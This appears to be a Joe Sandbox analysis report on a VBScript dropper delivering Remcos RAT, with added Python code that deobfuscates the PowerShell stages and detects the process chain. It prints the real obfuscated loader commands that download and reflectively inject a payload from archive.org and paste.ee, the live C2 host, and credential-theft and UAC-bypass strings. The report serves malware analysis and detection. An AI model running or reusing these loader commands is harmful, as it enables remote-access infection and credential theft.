
Windows Analysis Report
OIQ1ybtQdW.vbs

Overview

General Information

Sample name: OIQ1ybtQdW.vbs (renamed because the original name is a hash value)
Original sample name: 8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368.vbs
Analysis ID: 1523833
MD5: 4a31a1de3d99c80d908ddda051e2f761
SHA1: 302e19edb2c96cc78cb866c2d78d7f2fc77e8297
SHA256: 8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368
Tags: BlindEagle, vbs, user-JAMESWT_MHT

Detection

Remcos, PureLog Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 8028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
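Added example, not part of the Joe Sandbox report: a Python script that statically undoes the obfuscation of the two PowerShell stages in the process tree above. It resolves the `(VARIaBLe '*MDr*').naMe[3,11,2]-jOiN''` trick (the letters at indexes 3, 11 and 2 of the built-in variable name MaximumDriveCount spell `iex`) against a small list of built-in PowerShell variable names, evaluates the `'..'+'..'` concatenation and the two `.replAce()` calls, and reverses the first argument handed to RunPE.Home.VAI, which turns out to be a paste.ee URL. The stage-2 string is copied verbatim from the PID 7540 command line; the list of built-in variable names is an assumption (a hand-picked subset, sufficient for this sample), and nothing from the sample is executed.

```python
"""Static deobfuscation of the two-layer PowerShell loader seen in this report.

Added example: nothing here executes the sample; it only rewrites strings the
way PowerShell would before handing them to Invoke-Expression.
"""
import re
from fnmatch import fnmatchcase

# Stage 2 (the decoded $Codigo), copied from the powershell.exe PID 7540 command
# line in the process tree, without the outer powershell.exe -command "..." wrapper.
STAGE2 = (
    "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'"
    "+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'"
    "+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'"
    "+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'"
    "+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'"
    "+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'"
    "+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'"
    "+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'"
    "+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'"
    "+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'"
    "+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))')"
    ".replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
)

# Assumption: a hand-picked subset of PowerShell's built-in variable names is
# enough to resolve the (Variable '*MDr*').Name wildcard used by this sample.
BUILTIN_VARIABLES = [
    "MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount",
    "MaximumFunctionCount", "MaximumHistoryCount", "MaximumVariableCount",
    "PSHOME", "PSVersionTable", "ErrorActionPreference", "VerbosePreference",
]

VAR_NAME_RE = re.compile(
    r"\(\s*variable\s+'([^']+)'\s*\)\.name\[([\d,\s]+)\]\s*-join\s*''", re.I)
REPLACE_RE = re.compile(
    r"\.replace\('([^']*)'\s*,\s*(?:'([^']*)'|\[string\]\[char\](\d+))\)", re.I)
CONCAT_RE = re.compile(r"(?:'[^']*'\+)+'[^']*'")      # a run of 'a'+'b'+'c'


def resolve_variable_alias(cmd):
    """Spell out (Variable '*MDr*').Name[3,11,2]-join'' from the matching variable name."""
    m = VAR_NAME_RE.search(cmd)
    if not m:
        return None
    pattern = m.group(1).lower()
    indexes = [int(i) for i in m.group(2).split(",")]
    hits = [v for v in BUILTIN_VARIABLES if fnmatchcase(v.lower(), pattern)]
    if len(hits) != 1:
        raise ValueError(f"wildcard {pattern!r} is ambiguous: {hits}")
    return "".join(hits[0][i] for i in indexes)


def deobfuscate_stage2(cmd):
    """Evaluate the '..'+'..' concatenation and the trailing .Replace() calls."""
    chain = max(CONCAT_RE.findall(cmd), key=len)          # longest fragment run
    script = "".join(re.findall(r"'([^']*)'", chain))     # what PowerShell's + yields
    for old, literal, char_code in REPLACE_RE.findall(cmd):
        new = chr(int(char_code)) if char_code else literal
        script = script.replace(old, new)                 # applied in source order
    return script


def extract_iocs(script):
    """Pull network and process indicators out of the decoded stage-3 script."""
    url = re.search(r"\$url\s*=\s*'([^']*)'", script).group(1)
    type_name = re.search(r"GetType\('([^']+)'\)", script).group(1)
    method = re.search(r"GetMethod\('([^']+)'\)", script).group(1)
    arg_list = re.search(r"\.Invoke\(\$null,\s*\[object\[\]\]@\((.*)\)\)", script).group(1)
    args = re.findall(r"'([^']*)'", arg_list)
    return {
        "loader_url": url,                 # base64-encoded .NET assembly (RunPE loader)
        "payload_url": args[0][::-1],      # first argument is stored reversed
        "entry_point": f"{type_name}.{method}",
        "host_process": args[4],           # process name the loader injects into
    }


if __name__ == "__main__":
    print("invoker     :", resolve_variable_alias(STAGE2))
    decoded = deobfuscate_stage2(STAGE2)
    print("stage 3     :", decoded)
    for key, value in extract_iocs(decoded).items():
        print(f"{key:12}: {value}")
```

The decoded stage 3 downloads a base64-encoded .NET assembly from the archive.org URL that VirusTotal flags in the AV Detection section, loads it with [Reflection.Assembly]::Load, and calls RunPE.Home.VAI with the reversed paste.ee URL (the pastebin-service connection in the signature list) and the string 'AddInProcess32', which matches the AddInProcess32.exe child that the injection and keylogger signatures fire on.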
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Extracted malware configuration (Remcos):
{
  "Host:Port:Password": "23spt.duckdns.org:3000:0",
  "Assigned name": "TsosT",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-DCR6HW",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Yara matches (dropped files)
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author
0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x144b8:$a1: Remcos restarted by watchdog!
  • 0x14a30:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(5 of 23 entries shown)

Yara matches (unpacked PEs)
Source | Rule | Description | Author
11.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
11.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
11.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
11.2.AddInProcess32.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
11.2.AddInProcess32.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
(5 of 16 entries shown)

                  System Summary

Sigma rule matches (process creation). The command lines are the ones shown in the process tree above, where the same PIDs appear; the stage-1 base64 blob is written as <base64 blob> rather than repeated, and the stage-2 script is abbreviated with "...".
  • Rule author: Florian Roth (Nextron Systems). Process started: powershell.exe (PID 7360, stage 1). Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '<base64 blob>';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  • Rule authors: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp). Process started: powershell.exe (PID 7540, stage 2). Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+ ... +'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))". CommandLine|base64offset|contains: v,)^. Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. ParentCommandLine: the stage-1 command above.
  • Rule authors: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton. Process started: powershell.exe (PID 7540, stage 2); same command and fields as the previous entry.
  • Rule author: Florian Roth (Nextron Systems). Process started: powershell.exe (PID 7360, stage 1); same command as the first entry.
  • Rule authors: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community. Process started: wscript.exe (PID 7268). Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs". Image / NewProcessName / OriginalFileName: C:\Windows\System32\wscript.exe. ParentCommandLine and ParentImage: empty. ParentProcessId: 2592. ProcessName: wscript.exe.
  • Rule author: frack113. Process started: powershell.exe (PID 7360, stage 1); same command as the first entry.
  • Rule author: Michael Haag. Process started: wscript.exe (PID 7268); same command and fields as the wscript.exe entry above.
  • Rule authors: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Process started: powershell.exe (PID 7360, stage 1); same command as the first entry.
  • Rule authors: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton. Process started: powershell.exe (PID 7540, stage 2); same command and fields as the second entry.
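Added example, not part of the report and not Sigma: Python detection logic that expresses, over process-creation events, what the Sigma hits above are keyed on: a script host spawning PowerShell, PowerShell launched with -executionpolicy bypass / -windowstyle hidden / -NoProfile, FromBase64String plus a long base64 blob on the command line, a nested PowerShell stage, and a bare .NET host (AddInProcess32.exe) started by PowerShell with no arguments, the typical target of a RunPE-style injection. The events are constructed from the process tree (PIDs, parents and images as reported; the stage-1 base64 blob is replaced by a placeholder of the same character class and the stage-2 script is abbreviated) plus one benign control event; the host lists, the 200-character blob threshold and the field names are assumptions modelled on Sysmon event 1.

```python
"""Process-chain detection for the WScript -> PowerShell -> .NET host pattern."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
B64_PLACEHOLDER = "A" * 400          # stands in for the 1.8 KB $Codigo blob

# Constructed events modelled on the process tree in this report (PIDs, parents
# and images as reported; command lines abbreviated) plus one benign control.
EVENTS = [
    ProcEvent(7268, 2592, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"'),
    ProcEvent(7360, 7268, PS_IMAGE,
              '"' + PS_IMAGE + '" -command $Codigo = '
              + f"'{B64_PLACEHOLDER}';$OWjuxd = [system.Text.encoding]::UTF8.GetString("
              "[system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden "
              "-executionpolicy bypass -NoProfile -command $OWjuxD"),
    ProcEvent(7540, 7360, PS_IMAGE,
              '"' + PS_IMAGE + '" -windowstyle hidden -executionpolicy bypass -NoProfile -command '
              "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+ ... )"),
    ProcEvent(8028, 7540, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"'),
    # Benign control: an interactive console running an on-disk script.
    ProcEvent(9001, 4000, PS_IMAGE, r"powershell.exe -File C:\Scripts\Inventory.ps1"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOTNET_HOSTS = {"addinprocess32.exe", "addinprocess.exe", "regasm.exe",
                "regsvcs.exe", "installutil.exe", "msbuild.exe"}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")   # assumption: threshold of 200 chars


def basename(path):
    return path.rsplit("\\", 1)[-1].strip('"').lower()


def powershell_flags(cmdline):
    """Command-line features typical of a staged PowerShell loader."""
    low = cmdline.lower()
    flags = []
    if re.search(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", low):
        flags.append("executionpolicy bypass")
    if re.search(r"-w(?:in(?:dowstyle)?)?\s+hidden", low):
        flags.append("hidden window")
    if re.search(r"-nop(?:rofile)?\b", low):
        flags.append("noprofile")
    if "frombase64string" in low:
        flags.append("FromBase64String")
    if B64_BLOB.search(cmdline):
        flags.append("long base64 blob")
    return flags


def is_bare_launch(ev):
    """True when the command line is nothing but the image path."""
    return ev.cmdline.strip().strip('"').lower() == ev.image.lower()


def analyse(events):
    """Return {pid: [findings]} for every process that looks like part of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for ev in events:
        parent = by_pid.get(ev.ppid)
        name = basename(ev.image)
        pname = basename(parent.image) if parent else ""
        hits = []
        if name == "powershell.exe":
            hits += powershell_flags(ev.cmdline)
            if pname in SCRIPT_HOSTS:
                hits.append(f"spawned by script host {pname}")
            if pname == "powershell.exe":
                hits.append("nested powershell (decoded stage)")
        if name in DOTNET_HOSTS and pname == "powershell.exe" and is_bare_launch(ev):
            hits.append("bare .NET host spawned by powershell (injection target)")
        if hits:
            findings[ev.pid] = hits
    return findings


def chain(events, pid):
    """Image names from the oldest known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    names = []
    while pid in by_pid:
        names.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return names[::-1]


def verdict(events):
    """Malicious when a script host leads, via PowerShell, to a bare .NET host."""
    findings = analyse(events)
    for pid, hits in findings.items():
        if any("injection target" in h for h in hits) and chain(events, pid)[0] in SCRIPT_HOSTS:
            return "malicious", chain(events, pid)
    return ("suspicious" if findings else "clean"), []


if __name__ == "__main__":
    for pid, hits in analyse(EVENTS).items():
        print(pid, "->", "; ".join(hits))
    print(verdict(EVENTS))
```

Each layer of the chain is flagged on its own (so a detection still fires if the injection target changes), and the verdict only escalates to malicious when the full ancestry from a script host down to a bare .NET host is present, which keeps an administrator's interactive PowerShell session out of the alert.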

                  Stealing of Sensitive Information

Source: File created (Author: Joe Security). EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 8028, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-10-02T05:29:49.484635+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 188.114.96.3:443 | 192.168.2.11:49706 | TCP
2024-10-02T05:29:49.484635+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 188.114.96.3:443 | 192.168.2.11:49706 | TCP
2024-10-02T05:29:50.412161+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49707 | 192.169.69.26:3000 | TCP
2024-10-02T05:30:01.255134+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49714 | 192.169.69.26:3000 | TCP
2024-10-02T05:30:12.004709+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49715 | 192.169.69.26:3000 | TCP
2024-10-02T05:30:22.770163+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49716 | 192.169.69.26:3000 | TCP
2024-10-02T05:30:33.926374+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49717 | 192.169.69.26:3000 | TCP
2024-10-02T05:30:44.693709+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49719 | 192.169.69.26:3000 | TCP
2024-10-02T05:30:55.885920+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49720 | 192.169.69.26:3000 | TCP
2024-10-02T05:31:06.763293+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49721 | 192.169.69.26:3000 | TCP
2024-10-02T05:31:17.567431+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49722 | 192.169.69.26:3000 | TCP
2024-10-02T05:31:28.523263+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49723 | 192.169.69.26:3000 | TCP
2024-10-02T05:31:39.301505+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49724 | 192.169.69.26:3000 | TCP
2024-10-02T05:29:49.310900+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.11:49706 | 188.114.96.3:443 | TCP


                  AV Detection

Source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos (the configuration listed in full in the Overview above: C2 23spt.duckdns.org:3000, mutex Rmc-DCR6HW, keylog file logs.dat)
Source: 23spt.duckdns.org; VirusTotal: Detection: 14% (reported by two signatures)
Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt; VirusTotal: Detection: 10%
Source: Yara match; File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted sample; Integrated Neural Analysis Model: matched with 100.0% probability
Source: powershell.exe, 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_066a8125-4)

                  Exploits

Source: Yara match; File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
Source: unknown; HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705, version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49706, version: TLS 1.2
